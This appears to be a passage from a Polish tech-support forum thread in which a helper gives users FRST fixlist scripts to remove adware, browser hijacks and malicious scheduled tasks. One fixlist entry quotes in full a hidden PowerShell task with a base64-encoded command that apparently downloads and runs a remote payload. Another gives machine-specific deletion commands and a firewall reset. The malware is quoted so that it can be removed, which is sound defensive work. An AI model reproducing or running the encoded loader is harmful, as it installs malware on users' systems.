picasso

Drobne poprawki. Otwórz Notatnik i wklej w nim: DeleteKey: HKCU\Software\Mozilla\Extends DeleteKey: HKCU\Software\RST DeleteKey: HKCU\Software\HQ Video Pro 3.1cV20.04 DeleteKey: HKCU\Software\HQ Video Pro 3.1cV20.04-nv-ie DeleteKey: HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\Installer DeleteKey: HKCU\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage\yoursites123.com DeleteKey: HKLM\SOFTWARE\Wow6432Node\FFPluginHp DeleteKey: HKLM\SOFTWARE\Wow6432Node\hdcode DeleteKey: HKLM\SOFTWARE\Wow6432Node\TSv DeleteKey: HKLM\SOFTWARE\Wow6432Node\HQ Video Pro 3.1cV20.04 DeleteKey: HKLM\SOFTWARE\Wow6432Node\HQ Video Pro 3.1cV20.04-nv-ie DeleteKey: HKU\S-1-5-18\Software\HQ Video Pro 3.1cV20.04-nv-ie RemoveDirectory: C:\FRST\Quarantine RemoveDirectory: C:\Program Files (x86)\HQ Video Pro 3.1cV20.04 RemoveDirectory: C:\Users\Zajace4\Desktop\Stare dane programu Firefox Folder: C:\ProgramData\{010DD54D-6F97-418D-BC47-2089F30A0075} Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Napraw (Fix). Tym razem nie będzie restartu. Przedstaw wynikowy fixlog.txt.

Zabrakło FRST.txt z konta Dom, co miało przedstawić konfigurację przeglądarek na tym koncie (każdy FRST.txt przedstawia inne profile). I drobne poprawki: NA KONCIE FILIP 1. Odinstaluj śmieci adware Gameo i Torch. 2. Ustaw jako domyślną wybraną przeglądarkę. Aktualnie jest wyasygnowany nieistniejący obiekt "Torch". 3. Otwórz Notatnik i wklej w nim: HKU\S-1-5-21-2087539395-219842756-2214252671-1003\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://go.microsoft.com/fwlink/?LinkID=617910&ResetID=130937265018648225&GUID=00000000-0000-0000-0000-000000000000 URLSearchHook: HKU\S-1-5-21-2087539395-219842756-2214252671-1003 - (Brak nazwy) - {0740f3dd-e1f0-4ec6-8855-04f999d071fa} - C:\Program Files (x86)\DownSpeedTest_dq\bar\1.bin\dqSrcAs.dll Brak pliku SearchScopes: HKU\S-1-5-21-2087539395-219842756-2214252671-1003 -> {6A1806CD-94D4-4689-BA73-E35EA1EA9990} URL = FF Plugin HKU\S-1-5-21-2087539395-219842756-2214252671-1003: TorchVLC -> C:\Users\Filip\AppData\Local\Torch\Plugins\Video\VLC\npvlc.dll [Brak pliku] Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Napraw (Fix). Przedstaw wynikowy fixlog.txt. NA KONCIE DOM 1. Otwórz Notatnik i wklej w nim: RemoveDirectory: C:\FRST\Quarantine RemoveDirectory: C:\ProgramData\MFAData RemoveDirectory: C:\Program Files\HaoZip RemoveDirectory: C:\Users\Filip\AppData\Roaming\HaoZip RemoveDirectory: C:\Users\Kacper\AppData\Roaming\HaoZip Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Napraw (Fix). Przedstaw wynikowy fixlog.txt. 2. Uruchom AdwCleaner. Wybierz opcję Skanuj i dostarcz log wynikowy z folderu C:\AdwCleaner.

Wszystko zroione. Kończymy: 1. Przez SHIFT+DEL (omija Kosz) skasuj z dysku odpadkowy folder: C:\ProgramData\Spybot - Search & Destroy. 2. Zastosuj narzędzie Fix-it usuwające drobny błąd WMI: KLIK. 3. Zastosuj DelFix oraz wyczyść foldery Przywracania systemu: KLIK. Jest to bardzo stara wersja z niezałatanymi lukami, jedna z dróg infekcji, np. szyfrujących dane (!). W w/w linku jest podane jaka jest najnowsza wersja Adobe Reader. Najlepszy do czyszczenia adware to AdwCleaner, ale akurat nie wykrywa tej modyfikacji. Jest wiele elementów adware, które są niewykrywalne narzędziami, zapóźnienie w detekcji.

Prócz tytułowego problemu, jest więcej aktywnych obiektów adware. Powinieneś także widzieć rozmaite reklamy, np. na Allegro. Działania do przeprowadzenia: 1. Otwórz Notatnik i wklej w nim: CloseProcesses: CreateRestorePoint: ShortcutWithArgument: C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Opera.lnk -> C:\Program Files (x86)\Opera\launcher.exe (Opera Software) -> hxxp://www.yoursites123.com/?type=sc&ts=1452253355&z=8f6443bb6331334243727aag5zfw8odofw9c4c7wco&from=wpm01073&uid=WDCXWD3200BPVT-22JJ5T0_WD-WXF1E81UYJL6UYJL6 HKU\S-1-5-21-1157007284-3841837932-3106168173-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://go.microsoft.com/fwlink/?LinkID=617910&ResetID=130993241260851382&GUID=00000000-0000-0000-0000-000000000000 HKU\S-1-5-21-1157007284-3841837932-3106168173-1000\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.yoursites123.com/?type=hp&ts=1452253355&z=8f6443bb6331334243727aag5zfw8odofw9c4c7wco&from=wpm01073&uid=WDCXWD3200BPVT-22JJ5T0_WD-WXF1E81UYJL6UYJL6 SearchScopes: HKLM -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://yoursites123.com/web?type=ds&ts=1452253355&z=8f6443bb6331334243727aag5zfw8odofw9c4c7wco&from=wpm01073&uid=WDCXWD3200BPVT-22JJ5T0_WD-WXF1E81UYJL6UYJL6&q={searchTerms} SearchScopes: HKLM-x32 -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSE1 SearchScopes: HKLM-x32 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSE1 SearchScopes: HKU\S-1-5-21-1157007284-3841837932-3106168173-1000 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://yoursites123.com/web?type=ds&ts=1452253355&z=8f6443bb6331334243727aag5zfw8odofw9c4c7wco&from=wpm01073&uid=WDCXWD3200BPVT-22JJ5T0_WD-WXF1E81UYJL6UYJL6&q={searchTerms} SearchScopes: HKU\S-1-5-21-1157007284-3841837932-3106168173-1000 -> {szukaj.gazeta.pl} URL = hxxp://szukaj.gazeta.pl/internet/0,0.html?slowo={searchTerms} BHO-x32: Brak nazwy -> {d00ab4cc-662c-40b6-a85f-d53086f4bb16} -> Brak pliku Toolbar: HKLM - avast! Online Security - {318A227B-5E9F-45bd-8999-7F8F10CA4CF5} - Brak pliku Toolbar: HKLM - Brak nazwy - {CC1A175A-E45B-41ED-A30C-C9B1D7A0C02F} - Brak pliku Task: {278A9DBA-62D1-4376-9EA7-ED444CD029B4} - System32\Tasks\AdminShipkeeperXenolithsV2 => Rundll32.exe YardingConservatively.dll,main 7 1 Task: {3A7FD0B5-4676-49CE-9E70-9ED19B714969} - System32\Tasks\{C25597C8-7C39-4F4A-893C-04C6732440F6} => pcalua.exe -a C:\Users\Admin\AppData\Roaming\yoursearching\UninstallManager.exe -c -ptid=cornl Task: {4EA137CC-4CCE-481A-98FB-901677621525} - System32\Tasks\{6C961D7F-9D78-4A55-8AE3-5F5C92C1DFAC} => Firefox.exe hxxp://ui.skype.com/ui/0/6.3.73.105.456/pl/abandoninstall?page=tsProgressBar Task: {4EF62F18-F30D-45EF-BC3E-F00E781761FB} - System32\Tasks\{C4E1EAC5-EBC4-4145-ABC0-4530E24C3F04} => Firefox.exe hxxp://ui.skype.com/ui/0/6.6.0.106/pl/abandoninstall?page=tsPlugin Task: {561026AD-BBB2-4EB8-B29D-48CA246F0762} - System32\Tasks\{70DA3F7B-9CA4-4C2E-AF83-7643DEB344E4} => pcalua.exe -a E:\westerner\setup.exe -d E:\westerner Task: {611B9B6D-76FB-4B4B-B548-B153B94D009F} - System32\Tasks\{410AE0AC-A18D-4FE1-ABCD-70E2873239E8} => Firefox.exe hxxp://ui.skype.com/ui/0/6.6.0.106/pl/abandoninstall?page=tsPlugin Task: {6C519167-262A-4200-9BBB-ED0FA27AD2DC} - System32\Tasks\{73BE4A54-9082-4DA1-83D9-A314C418D544} => Firefox.exe hxxp://ui.skype.com/ui/0/6.6.73.106.456/pl/abandoninstall?page=tsWLM Task: {9091ECCC-0947-4AB5-97A3-F4F7B63BC278} - System32\Tasks\{0F7F7947-050A-797E-7A11-7A090F79117A} => powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand JABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQA9ACIAcwB0AG8AcAAiADsAJABzAGMAPQAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAVwBhAHIAbgBpAG4AZwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFAAcgBvAGcAcgBlAHMAcwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFYAZQByAGIAbwBzAGUAUAByAGUAZgBlAHIAZQBuAGMAZQA9ACQAcwBjADsAJABEAGUAYgB1AGcAUAByAGUAZgBlAHIAZQBuAGMAZQA9ACQAcwBjADsACgBmAHUAbgBjAHQAaQBvAG4AIABzAHIAKAAkAHAAKQB7ACQAbgA9ACIAVwBpAG4AZABvAHcAUABvAHMAaQB0AGkAbwBuACIAOwB0AHIAeQB7AE4AZQB3AC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgACQAcAB8AE8AdQB0AC0ATgB1AGwAbAA7AH0AYwBhAHQAYwBoAHsAfQB0AHIAeQB7AE4AZQB3AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAkAHAAIAAtAE4AYQBtAGUAIAAkAG4AIAAtAFAAcgBvAHAAZQByAHQAeQBUAHkAcABlACAARABXAE8AUgBEACAALQBWAGEAbAB1AGUAIAAyADAAMQAzADIAOQA2ADYANAB8AE8AdQB0AC0ATgB1AGwAbAA7AH0ACgBjAGEAdABjAGgAewB0AHIAeQB7AFMAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAkAHAAIAAtAE4AYQBtAGUAIAAkAG4AIAAtAFYAYQBsAHUAZQAgADIAMAAxADMAMgA5ADYANgA0AHwATwB1AHQALQBOAHUAbABsADsAfQBjAGEAdABjAGgAewB9AH0AfQBzAHIAKAAiAEgASwBDAFUAOgBcAEMAbwBuAHMAbwBsAGUAXAAlAFMAeQBzAHQAZQBtAFIAbwBvAHQAJQBfAFMAeQBzAHQAZQBtADMAMgBfAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABfAHYAMQAuADAAXwBwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIgApADsAcwByACgAIgBIAEsAQwBVADoAXABDAG8AbgBzAG8AbABlAFwAJQBTAHkAcwB0AGUAbQBSAG8AbwB0ACUAXwBTAHkAcwB0AGUAbQAzADIAXwBzAHYAYwBoAG8AcwB0AC4AZQB4AGUAIgApADsAcwByACgAIgBIAEsAQwBVADoAXABDAG8AbgBzAG8AbABlAFwAdABhAHMAawBlAG4AZwAuAGUAeABlACIAKQA7AAoAJABzAHUAcgBsAD0AIgBoAHQAdABwADoALwAvAHMAZQBjAHUAcgBlAGIALgBpAG4AZgBvAC8AdQAvAD8AYQA9ADMAZgB0AGMAWQB5AFYANwAzAHgAcABPAEoAdAAxADkANwBjAFEASQB1AHMAWQBKAGYAbgBBADEAbABjAE8AMgBSAGcAcABpAG4ASgBzAEQAVwBQAGsAQgBBADAARQBrAEsAMwBHAEUAeQBoAEEAYQBrAHIATQBOAF8AMQBLADcAbgBSAGIAWQBoAFMAUQBoAGkAXwBYAHAAbwBjAFIASwBRAEMATABqAFMAdgBxAEEAYwB5ADUAawAzAEQAMgA0AFIAdgB4AHAASwBpAFkASgBmAHoAbwBLADUAVABOAFoAeQBEAEEASQBwAEQATABfAEEAZgBLAEoAcABkAEUAbABUADQAXwBhAFEASgBFAGMAbwB6AEMAQQBJADUAbQBCAGYATABIAEQASABYAFkAcQBwAHMAcQBEAEoAdgByAEoARABHAHUAWABJADUAeABCAHgAawB5AFQANgBjAGIASgAyAGMAaQAwAHUAQQBqADIANwBZAEsALQBZAHkAYwBFADkARwBkAHoARgBHAEoAWABhADMAZABTAGMAQgBGAGIALQA1ADEATwAtAG8ALQBPAFIAdQBwAGEAbgBHAHAAYQBQADIAaABOAG0AcAA5AHoAbQA0AHAAMAA4AEYAeQB4AEEAdwBIAFEAVwBmADcAUgBXAHUANwBRAGkAZwA0ADkAVwBpAG4AWQBLAGkAOAAyAEgAaQBDADMAbwBCAG4AWAAtAFEARQBKAEsAdwBIAHgAMABZADAASQB6AFkAVwBvAEEAagB4AFQATABTAFIAeAB5AFQAQQByAEcAawBoAGMARABGAEgAdgBIAEkAMQBwAEoAdQB3AEQANABGADMAbwBEAEsAeQBtADgATgBkAEkAWgAtAEQATQAwAGMAUwBYADAAMgBiADEALQBkADUAYgAyAG0AaAB0AFQAZwBHAEIARQBoAEYAQgB1AEMAQwBwAEUAWABQAHkAZABpAGcAdwB5AGEAcABZAHgATgB0AEsATAB4AHMAaQBQAHQATABNAHAAcAA0AGoAegBSAFEARABWADQAUwBuAHEAbgBfAEoASABEAGcAMgBmAE0AdgB1AFcARgBNAF8ATgBCADkANAB4AHcARAA2AEEAegAtAEMARQBJAF8ARwBfADAAcAB4ADUAUQBxAGIAUABkAEoAagBHADcATwBZAGsAcQB0AFkAVwBlADcANQBKAHUAVAAzAFEAUQBCADEAawBCAFcAbABVAEMATABIADEAcABpAGoANQBZAFYAVwBlAHAAcQBPAFUAOQA1ADQAeABQAEYAMABCAHMAawBjAEQAbwBQAGIAagBVAGoAeABJADQAZwBGAFYAWgBVAG0AdgBNAFAALQB3AEEAcABiAHcAdgBuAFMATgBGAHIAMwAyAF8AYwAyAEYAcwA1ADMAMwBTAFoAdgA2AFgAQwA3AFMAeABpAHkAUABlAGcAYQBUAFQAQwBTAEYAUABVADMAZQBDAEQAZwBRAHUAWgAwAGYARQBFAC0AUABNADAAOABDADIAVABnAGgAUwB6AC0AaQB5AEsAaABZAEEARgA0AEUAeQA3AHEATwB0AHEAZQA2AEwARAB3ADIATwBuAGkAcgBiADAAdAAyAG8AcwA1AEMAWAB4AF8AcABQAE4AYwBPADkAbwBvADMAdAB0AEgARwBfAEkAaQBhAGYAQQBPAHYAcABaAGkAcwBlAEQAUgB4AFAAeQAyAHUALQA4AEkAXwBtAHMARgAxAEMAMQA2AFcARwBlAFUAQwB0AHQALQBtAGcANgB6AFMAdQBtAGwAcABJAGgARQBGAEwAOQAwAEMAMQB1AHcAWQA5AEUANgBnADUAbgBGAEYANABkAGcAMABVADMAcQBsAFUAbABfAHYAVwBDAHkARgBCAEIAdwBGAGsAQQBWAHcAaAB6AEQASgByADMAMQBNAEQASgAzAEMAcwBVAEoAMwBCAGMAXwBMADEARwBJAFcASgBtAFYAUwBpADUAVABFAGkARgBkAHkAdQBkAHcAMgBzAEMAaAA3AHcALQBMAE4AYQBFAEcANQBvAHMAagBDAEEAeQB5ADUALQBwAG0AdwBhAFYAdwBoAG0AeABBAGUAMQBjAFMANABuADUAcABzAFQAegBfAGEANQBfAEgAaQBoAEkAZgBKADkAcQAxAGYAYQBIAHYAaABaAGEAUQB0AGwAMABJAFQAQQBQAEUAcQBUAGUAbAAtAHcARwBlAHoANQBpADIAdgB5AFUAcgBjAF8AYwAyAGMAdwB4AEEAeQA4AGIAbgAzADIAUgB5AEkAUgBWAEMAbgBGAFoAbQBaAEIAMwAwAHMAcQBWAEUANQB5ADQANwBZAFIANwBqADcAZwA3AFQAZgBNADcAagBRADkAawB5ACYAYwA9AEMAUABaADAASAA1AEkANQBxAFQAcQBuAFEAMgBVADIAZAA0AFEAWQAtAFcARQB5AE8AUQBGAE8AYwBRAHAAegAwAEIAWgBLADYAUgBTAHkAVgBRAEUAYQBSAEEAXwBtAFIARwBZAGUAUgBhAEIAZwBOAC0AZAAwADgAWgB4ADcATwBWAGIAUwB3AEgARwBlADkATABlAEIASgBQADgAVgBIAHcAdQBGAHYANwBtAFYAVgBZAEcAdAB4AHcARQBUAHYAUABnAHEAaQAzAG8AQQBxAEUAdQB2AHEATQBWAHoAVABpAGwANABIAHEAZgBkADYAXwB5ADIASAAxAFMASABiAEIAUwBhADAAWAA2AEcAcQBSAHAAcQBIAG4AeQB4AG8AdgBHAE0AMgBRAE4AOAAxADIAZABrAG8ANQBiAGQAOQBzAFUATABEAGwATQB2ADIAeABkADkAYgBEAFAATQB5AEYAMABFAHgAWABmAHYAVAA1ADQAUgBDAFIARwBEAGUAdABpAEEAVAB2ADIASgBaAGsAeQB5ADEAdAAzAGoAZwB5AHUAZwBRAFQAQQBrADEAYwB6ADcAYQBEAHoAQwBNADcATgAwAHcAXwBUAGkATQByADAANABEADYAUwBpAEMATwBwAHcAMgB5ADIAcwBiAGoAUQBpAHgAdQBfAGgAZAA2AHMAagBfAHoASwBQAHoALQBoAEwAWABKAC0AUAB5AHkAUQA1AEgAawBNAFQALQBXAEMAbgBFAGIAVwBiAFIAcwB2AGYARQBZAEEARABOAGwAMABSAE8AUABxAHQAMwBHADAATQBmAEwAYgA4ADMASQBQAGsAMgBmAGwANwBCAHUATgA0AGYAUgBwAFcAdABVADcAVgBuAHoAXwA2AFIATgBKAHEAagBiAFAAQQBfAGIAZABHAHoAcQBVADIAagBSAHkAQwBhAGkAMABzAHMAQgBCAGcAUAAxAHEAQQBRAEkAOQBEAHoAcABWAE4AbQB3AEMAUgBEAG0AcQBrADcAbABEADMAeABqAFAAMgBwAFoAVgB6AFoAOABmAEkALQBRAHkAVQBFAGoARgBSAEkATwBvAE0ARwBrAEQAUQA2AEcAVQBOAFoATQBZAEoAWQBrADYAdABUAC0AUwAzAGcATgAwADIAWABLAFYANwA3AE4AeQB0AFkAbgBwAHEANwA5AG8ANwAzAF8AVQAyAHMAbQBvAE4AcQBsAGoASwBaAF8AawB1AG4AVABMAG0AbwB1AFQAYgA4AFQASQA5AEcAMgBPAEQAUQBjAEgARQBMAFEATgBjAE0AYQB6AGcAMQBpAEgAUAB6AGIAMABIAEMAOABqAGwAQgA3AG8AMwBUAGEAWgBfAGYAdQBJAF8AUwBrAFYAQgBoADEAdgBXADUAQgBUAG8AdgBvAFIALQBtAEIAcwBKAGoAOQBMAGQAegBEADIATABuAEEALQBiADcAagB2ADcAagBTAGgAQQBzAHcAUgBkAEUAUwBMAHEAaQBJAEoAMwBHAEwAQwBrAGgAcQBsAFYAZABQAEMAegBEAEUAVQAwAGwASwBRAHcAYwBpAFcARwBPAHIALQBhAGUANwAxAHcAUQBWAC0AbgBGAGsANgB3AFoAZQA4AEcAUQA5AFQATQBkAEQAawBtAEcATQBEAHUAcgBtAGIAQwBoADgAaABwAC0ARQB3AEgALQBXAEsARQBIAG4AdQBkAHUAcwB5ADEAcwBEAFYAcABPAGkAbwBGAHEAZQBlADEAXwA5AGgATwBMAGUANgB6AHUANQBuAC0AXwAzAHEAMgB5AGwAUgBDAFUAUAB2AHcAbABnAFUAVgAwAEQARwA0AGcARgBBAEsAcABjAEUANQAzAHYAUQA2AEMAcwBRADAARQBNADkARABUADgAdQBuAHcANABaAHEAZwA5ADQAaABnADUAcABqAGYAawBuAEcAVABRAEcAZQBwAHAAVgBlAEoAWQBoAEcAcwBoAGMAVwB6AHQAeQBXAFMAYgBHADIASwB3AFUAYgB5AHEAMgBJAGwARQA0AFUALQBIAG0AQgAwAEIAMAB0ADUAWQBnAGoAQwBkAHIAawBYAGgARABsAHkAUAB0AFgAcQBkAGcATgBzAGUANgBZAGwATABvAHkAbgAxAHoAQwBkAEcAaQBFAGsAbABsADEAcABfAEUAbgBjAHAAcgB1AFEANwBkAGwAOABRAHkATwAtAG8AbwBLAGcAegBXAGUAOABRADUAeABwAEEAMgB3AE0ASgBLAFQASwBYAGIAYwBjAGEAQQBEAG8ASgBjAFMAWgBIAGQAcgBsAGgAQgBQAEIAeAA0AF8AdgByAEIANABBAFUANwAxAHEAbgBBAEwAdQBiAEMAcgB5AFoAQgBvAEYAUQBmAHQAZwBkADEALQBXAGMAWAByAGsAWQBfACYAcgA9ADEANwA1ADMAMwA2ADYAMwA3ADUANwAwADkAOQA5ADYAMwAwADcAIgA7ACQAcwB0AHMAawA9ACIAewAwAEYANwBGADcAOQA0ADcALQAwADUAMABBAC0ANwA5ADcARQAtADcAQQAxADEALQA3AEEAMAA5ADAARgA3ADkAMQAxADcAQQB9ACIAOwAkAHAAcgBpAGQAPQAiAFMAeQBzAHQAZQBtAEgAZQBhAGwAZQByACIAOwAkAGkAbgBpAGQAPQAiAFEAMwA0AFYAMwBVAFUAUQAiADsAdAByAHkAewBpAGYAKAAkAFAAUwBWAGUAcgBzAGkAbwBuAFQAYQBiAGwAZQAuAFAAUwBWAGUAcgBzAGkAbwBuAC4ATQBhAGoAbwByACAALQBsAHQAIAAyACkAewBiAHIAZQBhAGsAOwB9ACQAdgA9AFsAUwB5AHMAdABlAG0ALgBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoATwBTAFYAZQByAHMAaQBvAG4ALgBWAGUAcgBzAGkAbwBuADsACgBpAGYAKAAkAHYALgBNAGEAagBvAHIAIAAtAGUAcQAgADUAKQB7AGkAZgAoACgAJAB2AC4ATQBpAG4AbwByACAALQBsAHQAIAAyACkAIAAtAEEATgBEACAAKAAoAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABXAGkAbgAzADIAXwBPAHAAZQByAGEAdABpAG4AZwBTAHkAcwB0AGUAbQApAC4AUwBlAHIAdgBpAGMAZQBQAGEAYwBrAE0AYQBqAG8AcgBWAGUAcgBzAGkAbwBuACAALQBsAHQAIAAyACkAKQB7AGIAcgBlAGEAawA7AH0AfQAKAGkAZgAoAC0ATgBPAFQAIAAoAFsAUwBlAGMAdQByAGkAdAB5AC4AUAByAGkAbgBjAGkAcABhAGwALgBXAGkAbgBkAG8AdwBzAFAAcgBpAG4AYwBpAHAAYQBsAF0AWwBTAGUAYwB1AHIAaQB0AHkALgBQAHIAaQBuAGMAaQBwAGEAbAAuAFcAaQBuAGQAbwB3AHMASQBkAGUAbgB0AGkAdAB5AF0AOgA6AEcAZQB0AEMAdQByAHIAZQBuAHQAKAApACkALgBJAHMASQBuAFIAbwBsAGUAKABbAFMAZQBjAHUAcgBpAHQAeQAuAFAAcgBpAG4AYwBpAHAAYQBsAC4AVwBpAG4AZABvAHcAcwBCAHUAaQBsAHQASQBuAFIAbwBsAGUAXQAgACIAQQBkAG0AaQBuAGkAcwB0AHIAYQB0AG8AcgAiACkAKQB7AGIAcgBlAGEAawA7AH0ACgBmAHUAbgBjAHQAaQBvAG4AIAB3AGMAKAAkAHUAcgBsACkAewAkAHIAcQA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAHIAcQAuAFUAcwBlAEQAZQBmAGEAdQBsAHQAQwByAGUAZABlAG4AdABpAGEAbABzAD0AJAB0AHIAdQBlADsAJAByAHEALgBIAGUAYQBkAGUAcgBzAC4AQQBkAGQAKAAiAHUAcwBlAHIALQBhAGcAZQBuAHQAIgAsACIATQBvAHoAaQBsAGwAYQAvADQALgAwACAAKABjAG8AbQBwAGEAdABpAGIAbABlADsAIABNAFMASQBFACAANwAuADAAOwAgAFcAaQBuAGQAbwB3AHMAIABOAFQAIAA2AC4AMQA7ACkAIgApADsAcgBlAHQAdQByAG4AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAcgBxAC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKAAkAHUAcgBsACkAKQA7AH0ACgBmAHUAbgBjAHQAaQBvAG4AIABkAHMAdAByACgAJAByAGEAdwBkAGEAdABhACkAewAkAGIAdAA9AFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJAByAGEAdwBkAGEAdABhACkAOwAkAGUAeAB0AD0AJABiAHQAWwAwAF0AOwAkAGsAZQB5AD0AJABiAHQAWwAxAF0AIAAtAGIAeABvAHIAIAAxADcAMAA7AGYAbwByACgAJABpAD0AMgA7ACQAaQAgAC0AbAB0ACAAJABiAHQALgBMAGUAbgBnAHQAaAA7ACQAaQArACsAKQB7ACQAYgB0AFsAJABpAF0APQAoACQAYgB0AFsAJABpAF0AIAAtAGIAeABvAHIAIAAoACgAJABrAGUAeQAgACsAIAAkAGkAKQAgAC0AYgBhAG4AZAAgADIANQA1ACkAKQA7AH0ACgByAGUAdAB1AHIAbgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBEAGUAZgBsAGEAdABlAFMAdAByAGUAYQBtACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKAAkAGIAdAAsADIALAAoACQAYgB0AC4ATABlAG4AZwB0AGgALQAkAGUAeAB0ACkAKQApACwAWwBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0AcAByAGUAcwBzACkAKQApAC4AUgBlAGEAZABUAG8ARQBuAGQAKAApADsAfQAKACQAcwBjAD0AZABzAHQAcgAoAHcAYwAoACQAcwB1AHIAbAApACkAOwBJAG4AdgBvAGsAZQAtAEUAeABwAHIAZQBzAHMAaQBvAG4AIAAtAGMAbwBtAG0AYQBuAGQAIAAiACQAcwBjACIAOwB9AGMAYQB0AGMAaAB7AH0AOwBlAHgAaQB0ACAAMAA7AA== Task: {BEE6820B-A5D5-45E6-AB6A-D5A4331B3475} - System32\Tasks\{B399420A-560F-4B7C-B3BD-F85BA49AEDAE} => Firefox.exe hxxp://ui.skype.com/ui/0/6.3.73.105.456/pl/abandoninstall?page=tsProgressBar Task: {C1C71FE9-F10E-4D9C-A5B7-ED922E21FB3A} - System32\Tasks\{9CFB0D6C-72B7-4916-92F8-2A43298E80F1} => pcalua.exe -a E:\DATA\Install.exe -d E:\DATA Task: {D7C0029C-1B7F-40A9-827E-8E6A1A46B1DC} - System32\Tasks\Price Fountain => C:\Users\Admin\AppData\Roaming\PRICEF~1\UPDATE~1\UPDATE~1.EXE Task: {F988A5E4-06EB-44F6-94CB-F946CD5678B8} - System32\Tasks\{E993273D-4EFE-4CEA-BCED-7F3E95AB859E} => Firefox.exe hxxp://ui.skype.com/ui/0/6.6.0.106/pl/abandoninstall?page=tsMain Task: C:\Windows\Tasks\Price Fountain.job => C:\Users\Admin\AppData\Roaming\PRICEF~1\UPDATE~1\UPDATE~1.EXE DeleteKey: HKCU\Software\1Q1F1S1C1P1E1C1F1N1C1T1H2UtF1E1I DeleteKey: HKCU\Software\dobreprogramy DeleteKey: HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\PriceFountain DeleteKey: HKCU\Software\Mozilla DeleteKey: HKLM\SOFTWARE\Mozilla DeleteKey: HKLM\SOFTWARE\MozillaPlugins DeleteKey: HKLM\SOFTWARE\Wow6432Node\Mozilla DeleteKey: HKLM\SOFTWARE\Wow6432Node\mozilla.org DeleteKey: HKLM\SOFTWARE\Wow6432Node\MozillaPlugins DeleteKey: HKLM\SOFTWARE\Wow6432Node\yoursites123Software DeleteKey: HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\yoursearching uninstall RemoveDirectory: C:\Program Files (x86)\Free PDF to Word Doc Converter RemoveDirectory: C:\Program Files (x86)\WinZipper RemoveDirectory: C:\ProgramData\e9d408a6-1113-1 RemoveDirectory: C:\ProgramData\e9d408a6-4d47-0 RemoveDirectory: C:\ProgramData\e9d408a6-53b1-0 RemoveDirectory: C:\ProgramData\e9d408a6-6ea5-1 RemoveDirectory: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Ares RemoveDirectory: C:\Users\Admin\AppData\Local\Gameo RemoveDirectory: C:\Users\Admin\AppData\Local\Mozilla RemoveDirectory: C:\Users\Admin\AppData\Local\ShipkeeperXenoliths RemoveDirectory: C:\Users\Admin\AppData\Roaming\Gameo RemoveDirectory: C:\Users\Admin\AppData\Roaming\GoldenGate RemoveDirectory: C:\Users\Admin\AppData\Roaming\Mozilla RemoveDirectory: C:\Users\Admin\AppData\Roaming\PriceFountain RemoveDirectory: C:\Users\Admin\AppData\Roaming\TSv RemoveDirectory: C:\Users\Admin\AppData\Roaming\WinZipper C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware\Tools\Malwarebytes Anti-Malware Chameleon.lnk C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\Ares.lnk C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Play Games Online.url C:\Users\Admin\Desktop\Continue WinRAR installation.lnk C:\Users\Admin\Desktop\sh-remover.exe C:\Windows\SysWOW64\pl.html CMD: netsh advfirewall reset 